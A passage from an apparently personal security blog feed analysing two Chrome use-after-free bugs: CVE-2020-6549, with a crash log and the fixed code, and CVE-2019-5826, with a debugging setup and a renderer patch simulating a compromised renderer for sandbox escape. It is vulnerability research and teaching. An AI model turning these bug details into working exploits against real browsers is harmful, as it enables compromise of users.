class="language-javascript"></span><span class="tag">&lt;/<span class="name">script</span>&gt;</span></span><br><span class="line"></span><br><span class="line"><span class="tag">&lt;<span class="name">body</span>&gt;</span><span class="tag">&lt;/<span class="name">body</span>&gt;</span></span><br><span class="line"></span><br><span class="line"><span class="tag">&lt;/<span class="name">html</span>&gt;</span></span><br></pre></td></tr></table></figure></li><li><p>This is the <a href="https://bugs.chromium.org/p/project-zero/issues/attachmentText?aid=456254">ASan log</a> printed by the reporter of the vulnerability:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span 
class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br></pre></td><td class="code"><pre><span class="line">==<span class="number">1</span>==ERROR: AddressSanitizer: use-after-poison on address <span class="number">0x7ef4388d0ab8</span> at pc <span class="number">0x7f87439d82fd</span> bp <span class="number">0x7ffdcd9cd990</span> sp <span class="number">0x7ffdcd9cd988</span></span><br><span class="line">READ of size <span class="number">8</span> at <span class="number">0x7ef4388d0ab8</span> thread <span class="built_in">T0</span> (chrome)</span><br><span class="line">    #<span class="number">0</span> <span class="number">0x7f87439d82fc</span> in blink::MemberBase&lt;blink::MediaStreamSource, (blink::TracenessMemberConfiguration)<span class="number">0</span>&gt;::<span class="built_in">GetRaw</span>() <span class="type">const</span> ./../../third_party/blink/renderer/platform/heap/member.h:<span class="number">250</span>:<span class="number">44</span></span><br><span class="line">    #<span class="number">1</span> <span class="number">0x7f87439d82fc</span> in blink::MemberBase&lt;blink::MediaStreamSource, 
(blink::TracenessMemberConfiguration)<span class="number">0</span>&gt;::<span class="keyword">operator</span> blink::MediaStreamSource*() <span class="type">const</span> ./../../third_party/blink/renderer/platform/heap/member.h:<span class="number">184</span>:<span class="number">32</span></span><br><span class="line">    #<span class="number">2</span> <span class="number">0x7f87439d82fc</span> in <span class="type">bool</span> WTF::HashTraitsEmptyValueChecker&lt;WTF::HashTraits&lt;blink::WeakMember&lt;blink::MediaStreamSource&gt; &gt;, <span class="literal">false</span>&gt;::IsEmptyValue&lt;blink::WeakMember&lt;blink::MediaStreamSource&gt; &gt;(blink::WeakMember&lt;blink::MediaStreamSource&gt; <span class="type">const</span>&amp;) ./../../third_party/blink/renderer/platform/wtf/hash_traits.h:<span class="number">350</span>:<span class="number">12</span></span><br><span class="line">    #<span class="number">3</span> <span class="number">0x7f87439d82fc</span> in <span class="type">bool</span> WTF::IsHashTraitsEmptyValue&lt;WTF::HashTraits&lt;blink::WeakMember&lt;blink::MediaStreamSource&gt; &gt;, blink::WeakMember&lt;blink::MediaStreamSource&gt; &gt;(blink::WeakMember&lt;blink::MediaStreamSource&gt; <span class="type">const</span>&amp;) ./../../third_party/blink/renderer/platform/wtf/hash_traits.h:<span class="number">355</span>:<span class="number">10</span></span><br><span class="line">    #<span class="number">4</span> <span class="number">0x7f87439d82fc</span> in WTF::HashTableHelper&lt;blink::WeakMember&lt;blink::MediaStreamSource&gt;, WTF::IdentityExtractor, WTF::HashTraits&lt;blink::WeakMember&lt;blink::MediaStreamSource&gt; &gt; &gt;::<span class="built_in">IsEmptyBucket</span>(blink::WeakMember&lt;blink::MediaStreamSource&gt; <span class="type">const</span>&amp;) ./../../third_party/blink/renderer/platform/wtf/hash_table.h:<span class="number">666</span>:<span class="number">12</span></span><br><span class="line">    #<span class="number">5</span> <span 
class="number">0x7f87439d82fc</span> in WTF::HashTableHelper&lt;blink::WeakMember&lt;blink::MediaStreamSource&gt;, WTF::IdentityExtractor, WTF::HashTraits&lt;blink::WeakMember&lt;blink::MediaStreamSource&gt; &gt; &gt;::<span class="built_in">IsEmptyOrDeletedBucket</span>(blink::WeakMember&lt;blink::MediaStreamSource&gt; <span class="type">const</span>&amp;) ./../../third_party/blink/renderer/platform/wtf/hash_table.h:<span class="number">673</span>:<span class="number">12</span></span><br><span class="line">    #<span class="number">6</span> <span class="number">0x7f87439d82fc</span> in WTF::HashTable&lt;blink::WeakMember&lt;blink::MediaStreamSource&gt;, blink::WeakMember&lt;blink::MediaStreamSource&gt;, WTF::IdentityExtractor, WTF::MemberHash&lt;blink::MediaStreamSource&gt;, WTF::HashTraits&lt;blink::WeakMember&lt;blink::MediaStreamSource&gt; &gt;, WTF::HashTraits&lt;blink::WeakMember&lt;blink::MediaStreamSource&gt; &gt;, blink::HeapAllocator&gt;::<span class="built_in">IsEmptyOrDeletedBucket</span>(blink::WeakMember&lt;blink::MediaStreamSource&gt; <span class="type">const</span>&amp;) ./../../third_party/blink/renderer/platform/wtf/hash_table.h:<span class="number">841</span>:<span class="number">12</span></span><br><span class="line">    #<span class="number">7</span> <span class="number">0x7f87439d82fc</span> in WTF::HashTableConstIterator&lt;blink::WeakMember&lt;blink::MediaStreamSource&gt;, blink::WeakMember&lt;blink::MediaStreamSource&gt;, WTF::IdentityExtractor, WTF::MemberHash&lt;blink::MediaStreamSource&gt;, WTF::HashTraits&lt;blink::WeakMember&lt;blink::MediaStreamSource&gt; &gt;, WTF::HashTraits&lt;blink::WeakMember&lt;blink::MediaStreamSource&gt; &gt;, blink::HeapAllocator&gt;::<span class="built_in">SkipEmptyBuckets</span>() ./../../third_party/blink/renderer/platform/wtf/hash_table.h:<span class="number">296</span>:<span class="number">12</span></span><br><span class="line">    #<span class="number">8</span> <span class="number">0x7f87439d82fc</span> 
in WTF::HashTableConstIterator&lt;blink::WeakMember&lt;blink::MediaStreamSource&gt;, blink::WeakMember&lt;blink::MediaStreamSource&gt;, WTF::IdentityExtractor, WTF::MemberHash&lt;blink::MediaStreamSource&gt;, WTF::HashTraits&lt;blink::WeakMember&lt;blink::MediaStreamSource&gt; &gt;, WTF::HashTraits&lt;blink::WeakMember&lt;blink::MediaStreamSource&gt; &gt;, blink::HeapAllocator&gt;::<span class="keyword">operator</span>++() ./../../third_party/blink/renderer/platform/wtf/hash_table.h:<span class="number">373</span>:<span class="number">5</span></span><br><span class="line">    #<span class="number">9</span> <span class="number">0x7f87439d82fc</span> in WTF::HashTableConstIteratorAdapter&lt;WTF::HashTable&lt;blink::WeakMember&lt;blink::MediaStreamSource&gt;, blink::WeakMember&lt;blink::MediaStreamSource&gt;, WTF::IdentityExtractor, WTF::MemberHash&lt;blink::MediaStreamSource&gt;, WTF::HashTraits&lt;blink::WeakMember&lt;blink::MediaStreamSource&gt; &gt;, WTF::HashTraits&lt;blink::WeakMember&lt;blink::MediaStreamSource&gt; &gt;, blink::HeapAllocator&gt;, WTF::HashTraits&lt;blink::WeakMember&lt;blink::MediaStreamSource&gt; &gt; &gt;::<span class="keyword">operator</span>++() ./../../third_party/blink/renderer/platform/wtf/hash_table.h:<span class="number">2219</span>:<span class="number">5</span></span><br><span class="line">    #<span class="number">10</span> <span class="number">0x7f87439d82fc</span> in blink::(anonymous <span class="keyword">namespace</span>)::MediaElementEventListener::<span class="built_in">UpdateSources</span>(blink::ExecutionContext*) ./../../third_party/blink/renderer/modules/mediacapturefromelement/html_media_element_capture.cc:<span class="number">249</span>:<span class="number">22</span></span><br><span class="line">    #<span class="number">11</span> <span class="number">0x7f87439e1d8f</span> in blink::(anonymous <span class="keyword">namespace</span>)::MediaElementEventListener::<span class="built_in">Invoke</span>(blink::ExecutionContext*, 
blink::Event*) ./../../third_party/blink/renderer/modules/mediacapturefromelement/html_media_element_capture.cc:<span class="number">231</span>:<span class="number">3</span></span><br><span class="line">    #<span class="number">12</span> <span class="number">0x7f874f33e534</span> in blink::EventTarget::<span class="built_in">FireEventListeners</span>(blink::Event&amp;, blink::EventTargetData*, blink::HeapVector&lt;blink::RegisteredEventListener, <span class="number">1u</span>&gt;&amp;) ./../../third_party/blink/renderer/core/dom/events/event_target.cc:<span class="number">909</span>:<span class="number">15</span></span><br><span class="line">    #<span class="number">13</span> <span class="number">0x7f874f33c411</span> in blink::EventTarget::<span class="built_in">FireEventListeners</span>(blink::Event&amp;) ./../../third_party/blink/renderer/core/dom/events/event_target.cc:<span class="number">823</span>:<span class="number">29</span></span><br><span class="line">    #<span class="number">14</span> <span class="number">0x7f874f3b13fa</span> in blink::Node::<span class="built_in">HandleLocalEvents</span>(blink::Event&amp;) ./../../third_party/blink/renderer/core/dom/node.cc:<span class="number">2896</span>:<span class="number">3</span></span><br><span class="line">    #<span class="number">15</span> <span class="number">0x7f874f312ae3</span> in blink::EventDispatcher::<span class="built_in">DispatchEventAtTarget</span>() ./../../third_party/blink/renderer/core/dom/events/event_dispatcher.cc:<span class="number">264</span>:<span class="number">29</span></span><br><span class="line">    #<span class="number">16</span> <span class="number">0x7f874f312ae3</span> in blink::EventDispatcher::<span class="built_in">Dispatch</span>() ./../../third_party/blink/renderer/core/dom/events/event_dispatcher.cc:<span class="number">206</span>:<span class="number">11</span></span><br><span class="line">    #<span class="number">17</span> <span class="number">0x7f874f311022</span> 
in blink::EventDispatcher::<span class="built_in">DispatchEvent</span>(blink::Node&amp;, blink::Event&amp;) ./../../third_party/blink/renderer/core/dom/events/event_dispatcher.cc:<span class="number">63</span>:<span class="number">16</span></span><br><span class="line">    #<span class="number">18</span> <span class="number">0x7f874f33261d</span> in blink::EventQueue::<span class="built_in">DispatchEvent</span>(blink::Event*) ./../../third_party/blink/renderer/core/dom/events/event_queue.cc:<span class="number">105</span>:<span class="number">13</span></span><br><span class="line">    #<span class="number">19</span> <span class="number">0x7f8775685257</span> in base::OnceCallback&lt;<span class="built_in">void</span> ()&gt;::<span class="built_in">Run</span>() &amp;&amp; ./../../base/callback.h:<span class="number">99</span>:<span class="number">12</span></span><br><span class="line">    #<span class="number">20</span> <span class="number">0x7f8775685257</span> in base::TaskAnnotator::<span class="built_in">RunTask</span>(<span class="type">char</span> <span class="type">const</span>*, base::PendingTask*) ./../../base/task/common/task_annotator.cc:<span class="number">142</span>:<span class="number">33</span></span><br><span class="line">    #<span class="number">21</span> <span class="number">0x7f87756c413a</span> in base::sequence_manager::internal::ThreadControllerWithMessagePumpImpl::<span class="built_in">DoWorkImpl</span>(base::sequence_manager::LazyNow*) ./../../base/task/sequence_manager/thread_controller_with_message_pump_impl.cc:<span class="number">332</span>:<span class="number">23</span></span><br><span class="line">    #<span class="number">22</span> <span class="number">0x7f87756c3a5c</span> in base::sequence_manager::internal::ThreadControllerWithMessagePumpImpl::<span class="built_in">DoWork</span>() ./../../base/task/sequence_manager/thread_controller_with_message_pump_impl.cc:<span class="number">252</span>:<span 
class="number">36</span></span><br><span class="line">    #<span class="number">23</span> <span class="number">0x7f877558447d</span> in base::MessagePumpDefault::<span class="built_in">Run</span>(base::MessagePump::Delegate*) ./../../base/message_loop/message_pump_default.cc:<span class="number">39</span>:<span class="number">55</span></span><br><span class="line">    #<span class="number">24</span> <span class="number">0x7f87756c53a2</span> in base::sequence_manager::internal::ThreadControllerWithMessagePumpImpl::<span class="built_in">Run</span>(<span class="type">bool</span>, base::TimeDelta) ./../../base/task/sequence_manager/thread_controller_with_message_pump_impl.cc:<span class="number">451</span>:<span class="number">12</span></span><br><span class="line">    #<span class="number">25</span> <span class="number">0x7f87756209fa</span> in base::RunLoop::<span class="built_in">Run</span>() ./../../base/run_loop.cc:<span class="number">124</span>:<span class="number">14</span></span><br><span class="line">    #<span class="number">26</span> <span class="number">0x7f876bb0b546</span> in content::<span class="built_in">RendererMain</span>(content::MainFunctionParams <span class="type">const</span>&amp;) ./../../content/renderer/renderer_main.cc:<span class="number">230</span>:<span class="number">16</span></span><br><span class="line">    #<span class="number">27</span> <span class="number">0x7f876bec022e</span> in content::<span class="built_in">RunZygote</span>(content::ContentMainDelegate*) ./../../content/app/content_main_runner_impl.cc:<span class="number">496</span>:<span class="number">14</span></span><br><span class="line">    #<span class="number">28</span> <span class="number">0x7f876bec3615</span> in content::ContentMainRunnerImpl::<span class="built_in">Run</span>(<span class="type">bool</span>) ./../../content/app/content_main_runner_impl.cc:<span class="number">863</span>:<span class="number">10</span></span><br><span class="line">    #<span 
class="number">29</span> <span class="number">0x7f877592a987</span> in service_manager::<span class="built_in">Main</span>(service_manager::MainParams <span class="type">const</span>&amp;) ./../../services/service_manager/embedder/main.cc:<span class="number">454</span>:<span class="number">29</span></span><br><span class="line">    #<span class="number">30</span> <span class="number">0x7f876bebe69f</span> in content::<span class="built_in">ContentMain</span>(content::ContentMainParams <span class="type">const</span>&amp;) ./../../content/app/content_main.cc:<span class="number">19</span>:<span class="number">10</span></span><br><span class="line">    #<span class="number">31</span> <span class="number">0x55f64fe33063</span> in ChromeMain ./../../chrome/app/chrome_main.cc:<span class="number">118</span>:<span class="number">12</span></span><br><span class="line">    #<span class="number">32</span> <span class="number">0x7f873e9a9e0a</span> in __libc_start_main /build/glibc-M65Gwz/glibc<span class="number">-2.30</span>/csu/../csu/libc-start.c:<span class="number">308</span>:<span class="number">16</span></span><br><span class="line"></span><br><span class="line">Address <span class="number">0x7ef4388d0ab8</span> is a wild pointer.</span><br><span class="line">SUMMARY: AddressSanitizer: use-after-<span class="built_in">poison</span> (/chromium/src/out/release_asan/libblink_modules.so<span class="number">+0x1b082fc</span>)</span><br><span class="line">Shadow bytes around the buggy address:</span><br><span class="line">  <span class="number">0x0fdf07112100</span>: f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7</span><br><span class="line">  <span class="number">0x0fdf07112110</span>: f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7</span><br><span class="line">  <span class="number">0x0fdf07112120</span>: f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7</span><br><span class="line">  <span class="number">0x0fdf07112130</span>: f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 
f7 f7</span><br><span class="line">  <span class="number">0x0fdf07112140</span>: f7 f7 f7 f7 f7 f7 f7 f7 f7 <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> f7</span><br><span class="line">=&gt;<span class="number">0x0fdf07112150</span>: <span class="number">00</span> <span class="number">00</span> f7 <span class="number">00</span> <span class="number">00</span> f7 f7[f7]f7 f7 f7 <span class="number">00</span> <span class="number">00</span> f7 <span class="number">00</span> <span class="number">00</span></span><br><span class="line">  <span class="number">0x0fdf07112160</span>: f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 <span class="number">00</span> <span class="number">00</span> f7 <span class="number">00</span> <span class="number">00</span> f7</span><br><span class="line">  <span class="number">0x0fdf07112170</span>: f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7</span><br><span class="line">  <span class="number">0x0fdf07112180</span>: f7 <span class="number">00</span> <span class="number">00</span> f7 <span class="number">00</span> <span class="number">00</span> f7 <span class="number">00</span> <span class="number">00</span> f7 <span class="number">00</span> <span class="number">00</span> f7 <span class="number">00</span> <span class="number">00</span> f7</span><br><span class="line">  <span class="number">0x0fdf07112190</span>: <span class="number">00</span> <span class="number">00</span> f7 <span class="number">00</span> <span class="number">00</span> f7 <span class="number">00</span> <span class="number">00</span> f7 f7 f7 f7 f7 f7 f7 f7</span><br><span class="line">  <span class="number">0x0fdf071121a0</span>: f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7</span><br><span class="line">Shadow byte <span class="built_in">legend</span> (one shadow byte represents <span class="number">8</span> application bytes):</span><br><span 
class="line">  Addressable:           <span class="number">00</span></span><br><span class="line">  Partially addressable: <span class="number">01</span> <span class="number">02</span> <span class="number">03</span> <span class="number">04</span> <span class="number">05</span> <span class="number">06</span> <span class="number">07</span></span><br><span class="line">  Heap left redzone:       fa</span><br><span class="line">  Freed heap region:       fd</span><br><span class="line">  Stack left redzone:      f1</span><br><span class="line">  Stack mid redzone:       f2</span><br><span class="line">  Stack right redzone:     f3</span><br><span class="line">  Stack after <span class="keyword">return</span>:      f5</span><br><span class="line">  Stack use after scope:   f8</span><br><span class="line">  Global redzone:          f9</span><br><span class="line">  Global init order:       f6</span><br><span class="line">  Poisoned by user:        f7</span><br><span class="line">  Container overflow:      fc</span><br><span class="line">  Array cookie:            ac</span><br><span class="line">  Intra object redzone:    bb</span><br><span class="line">  ASan internal:           fe</span><br><span class="line">  Left alloca redzone:     ca</span><br><span class="line">  Right alloca redzone:    cb</span><br><span class="line">  Shadow gap:              cc</span><br><span class="line">==<span class="number">1</span>==ABORTING</span><br></pre></td></tr></table></figure></li></ul><h3 id="c-修复后的代码">c. 
Fixed code</h3><p>The fixed function is shown below (<a href="https://source.chromium.org/chromium/chromium/src/+/master:third_party/blink/renderer/modules/mediacapturefromelement/html_media_element_capture.cc;l=251">fixed src</a>).</p><p>Compared with the original code, the fixed <code>UpdateSources</code> <strong>first copies the set</strong> and iterates over the copy instead of iterating over <code>sources_</code> directly. Even if a reentrant (inner) call to <code>UpdateSources</code> modifies <code>sources_</code>, the iterator used by the outer <code>UpdateSources</code> call is no longer affected.</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">void</span> <span class="title">MediaElementEventListener::UpdateSources</span><span class="params">(ExecutionContext* context)</span> </span>&#123;</span><br><span class="line">  <span class="keyword">for</span> (<span class="keyword">auto</span> track : media_stream_-&gt;<span class="built_in">getTracks</span>())</span><br><span class="line">    sources_.<span class="built_in">insert</span>(track-&gt;<span class="built_in">Component</span>()-&gt;<span class="built_in">Source</span>());</span><br><span class="line"></span><br><span class="line">  <span class="comment">// Handling of the ended event in JS triggered by DidStopMediaStreamSource()</span></span><br><span class="line">  <span class="comment">// may cause a reentrant call to this function, which can modify |sources_|.</span></span><br><span 
class="line">  <span class="comment">// Iterate over a copy of |sources_| to avoid invalidation of the iterator</span></span><br><span class="line">  <span class="comment">// when a reentrant call occurs.</span></span><br><span class="line">  <span class="comment">/*</span></span><br><span class="line"><span class="comment">    Note: the loop below iterates over sources_copy, a copy of sources_, rather than over sources_ itself.</span></span><br><span class="line"><span class="comment">    Even if UpdateSources is called again, the sources_copy set being traversed by the outer UpdateSources call is unaffected.</span></span><br><span class="line"><span class="comment">  */</span></span><br><span class="line">  <span class="keyword">auto</span> sources_copy = sources_;</span><br><span class="line">  <span class="keyword">if</span> (!media_element_-&gt;<span class="built_in">currentSrc</span>().<span class="built_in">IsEmpty</span>() &amp;&amp;</span><br><span class="line">      !media_element_-&gt;<span class="built_in">IsMediaDataCorsSameOrigin</span>()) &#123;</span><br><span class="line">    <span class="keyword">for</span> (<span class="keyword">auto</span> source : sources_copy)</span><br><span class="line">      <span class="built_in">DidStopMediaStreamSource</span>(source.<span class="built_in">Get</span>());</span><br><span class="line">  &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><h2 id="三、参考">3. References</h2><ul><li><a href="https://nvd.nist.gov/vuln/detail/CVE-2020-6549">NIST - CVE-2020-6549 Detail</a></li><li><a href="https://bugs.chromium.org/p/project-zero/issues/detail?id=2063">chromium project-zero Issue 2063</a></li><li><a href="https://developer.mozilla.org/zh-CN/">MDN</a> (<strong>highly recommended for looking up JS APIs</strong>)</li></ul>]]></content>
    
    
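    <summary type="html">&lt;h2 id=&quot;一、简介&quot;&gt;1. Introduction&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;CVE-2020-6549 is a use-after-free vulnerability in the media component of Google Chrome. In versions prior to 84.0.4147.125, it allows an attacker to cause heap corruption via a crafted HTML page.&lt;/li&gt;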
&lt;/ul&gt;</summary>
    
    
    
    <category term="vulnerability analysis" scheme="https://kiprey.github.io/categories/vulnerability-analysis/"/>
    
    <category term="chrome" scheme="https://kiprey.github.io/categories/vulnerability-analysis/chrome/"/>
    
    
    <category term="chrome" scheme="https://kiprey.github.io/tags/chrome/"/>
    
  </entry>
  
  <entry>
    <title>CVE-2019-5826 Analysis</title>
    <link href="https://kiprey.github.io/2020/10/CVE-2019-5826/"/>
    <id>https://kiprey.github.io/2020/10/CVE-2019-5826/</id>
    <published>2020-10-11T14:38:27.000Z</published>
    <updated>2025-11-24T03:59:39.764Z</updated>
    
    <content type="html"><![CDATA[<h2 id="简介">Introduction</h2><ul><li><p>CVE-2019-5826 is a use-after-free vulnerability in IndexedDB in Google Chrome. In versions prior to 73.0.3683.86, it allows an attacker who <strong>has already achieved RCE in the renderer</strong> to trigger a UAF and <strong>escape the sandbox</strong>.</p><span id="more"></span></li></ul><h2 id="一、环境搭建">1. Environment setup</h2><ul><li><p>The Chrome version I used is <code>73.0.3683.75</code> (<a href="https://source.chromium.org/chromium/chromium/src/+/refs/tags/73.0.3683.75:content/browser/indexed_db/indexed_db_database.cc">source</a>). Download the source, <strong>apply the patch</strong>, then build and run it. (Thanks to <a href="http://github.com/sadmess">@sad</a> for providing the binary; those of us without a build environment shed a tear T_T)</p><p>The patch is shown below. Why it is needed is explained in detail later.</p><figure class="highlight diff"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line">// third_party/blink/renderer/modules/indexeddb/web_idb_factory_impl.cc</span><br><span class="line">void WebIDBFactoryImpl::Open(</span><br><span class="line">       std::make_unique&lt;IndexedDBDatabaseCallbacksImpl&gt;(</span><br><span class="line">           base::WrapUnique(database_callbacks));</span><br><span class="line">   DCHECK(!name.IsNull());</span><br><span class="line">   factory_-&gt;Open(GetCallbacksProxy(std::move(callbacks_impl)),</span><br><span class="line">                  GetDatabaseCallbacksProxy(std::move(database_callbacks_impl)),</span><br><span class="line">                  name, version, transaction_id);</span><br><span class="line"><span class="addition">+  if (version == 3) &#123;</span></span><br><span class="line"><span class="addition">+   
 mojom::blink::IDBCallbacksAssociatedPtrInfo ptr_info;</span></span><br><span class="line"><span class="addition">+    auto request = mojo::MakeRequest(&amp;ptr_info);</span></span><br><span class="line"><span class="addition">+    factory_-&gt;DeleteDatabase(std::move(ptr_info), origin, name, true);</span></span><br><span class="line"><span class="addition">+    factory_-&gt;AbortTransactionsForDatabase(origin, base::OnceCallback&lt;void(blink::mojom::IDBStatus)&gt;());</span></span><br><span class="line"><span class="addition">+  &#125;</span></span><br><span class="line"> &#125;</span><br></pre></td></tr></table></figure></li><li><p>Copy the source of the following files (among others) from the <a href="https://source.chromium.org/chromium/chromium/src/+/refs/tags/73.0.3683.75:content/browser/indexed_db/indexed_db_database.cc">Chrome source</a>:</p><ul><li><code>indexed_db_database.cc</code></li><li><code>indexed_db_factory_impl.cc</code></li><li><code>web_idb_factory_impl.cc</code></li><li><code>indexed_db_connection.cc</code></li></ul><p>Save them into a <code>chromeSrc</code> folder in the current directory, <strong>so that the source code is available while debugging</strong>.</p><blockquote><p>Debugging Chrome without source is just too painful QwQ</p></blockquote></li><li><p>As usual, use a gdb script to assist debugging:</p><figure class="highlight sh"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># gdbinit</span></span><br><span class="line"><span class="comment"># Load symbols</span></span><br><span class="line">file ./chrome</span><br><span class="line"><span class="comment"># Set the launch arguments</span></span><br><span class="line"><span class="built_in">set</span> args http://localhost:8000/test.html</span><br><span class="line"><span class="comment"># Set the source path</span></span><br><span class="line">directory 
chromeSrc/</span><br><span class="line"><span class="comment"># Keep debugging the parent process after a fork</span></span><br><span class="line"><span class="built_in">set</span> follow-fork-mode parent</span><br></pre></td></tr></table></figure><blockquote><p>The <code>--headless</code> flag is not set here because <strong>refreshing a page in Chrome is much faster than restarting Chrome under gdb</strong>; after each change to the <code>exploit/poc</code>, just click refresh.</p></blockquote><p>Run the following command to start debugging:</p><figure class="highlight sh"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">gdb -x gdbinit</span><br></pre></td></tr></table></figure></li><li><p>If Chrome reports <code>No usable sandbox!</code> on startup, run the following command:</p><figure class="highlight sh"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">sudo</span> sysctl -w kernel.unprivileged_userns_clone=1</span><br></pre></td></tr></table></figure><p><strong>This setting is lost after a reboot</strong> and must then be applied again.</p></li></ul><h2 id="二、IndexedDB简介">2. Introduction to IndexedDB</h2><ul><li><p>Most of IndexedDB in Chrome is implemented in the browser process. Several mojo IPC interfaces exist between the browser and the renderer for inter-process communication, allowing the sandboxed renderer to perform IndexedDB operations.</p></li><li><p>The IndexedDBFactory <a href="https://source.chromium.org/chromium/chromium/src/+/master:third_party/blink/public/mojom/indexeddb/indexeddb.mojom">mojo interface</a> is the renderer's main entry point. <strong>Most operations (opening and closing databases, etc.) go through an IndexedDBFactory instance, which in turn operates on IndexedDBDatabase instances</strong> (keep this sentence in mind).</p></li><li><p>IndexedDB has the concepts of databases and connections. In Chrome's IndexedDB these are represented by the <code>IndexedDBDatabase</code> and <code>IndexedDBConnection</code> classes respectively. At any given time there can be <strong>multiple connections to the same database</strong>, but each database has <strong>only one IndexedDBDatabase object</strong>.</p></li><li><p>Another important concept is the <strong>request. Open and delete operations on a database cannot run at the same time</strong>; instead, requests to perform them are scheduled. This is implemented by the <code>IndexedDBDatabase::OpenRequest</code> and <code>IndexedDBDatabase::DeleteRequest</code> classes.</p><blockquote><p><code>OpenRequest</code> and <code>DeleteRequest</code> are declared inside the <code>IndexedDBDatabase</code> class; in other words, both are nested classes of <code>IndexedDBDatabase</code> (not subclasses in the inheritance sense).</p></blockquote></li><li><p>An IndexedDBDatabase object is a <strong>reference-counted object</strong>. Counted references to it are held by IndexedDBConnection objects, IndexedDBTransaction objects, and other in-progress or pending request objects. Once the reference count drops to 0, the object is freed immediately.</p></li><li><p>After the database object is freed, <strong>the corresponding raw pointer to the IndexedDBDatabase is removed from the database map</strong>. This point is very important.</p></li><li><p>Let's also take a quick look at the IndexedDB <code>JS API</code>:</p><figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">dbName = <span class="string">&quot;mycurrent&quot;</span>;</span><br><span class="line"><span class="comment">// Open a database named dbName; 2 is the database version</span></span><br><span class="line"><span class="comment">// Returns a request; here it corresponds to an OpenRequest</span></span><br><span class="line"><span class="keyword">var</span> request = indexedDB.<span class="title function_">open</span>(dbName, <span class="number">2</span>);</span><br><span class="line"><span class="comment">// onsuccess is the callback executed once the request has been processed</span></span><br><span class="line">request.<span class="property">onsuccess</span> = <span class="keyword">function</span> (<span class="params">event</span>) &#123;</span><br><span class="line">  <span class="comment">// On success, request.result is the opened database object</span></span><br><span class="line">  db = request.<span class="property">result</span>;</span><br><span class="line">&#125;</span><br><span class="line"><span class="comment">// Delete a database</span></span><br><span 
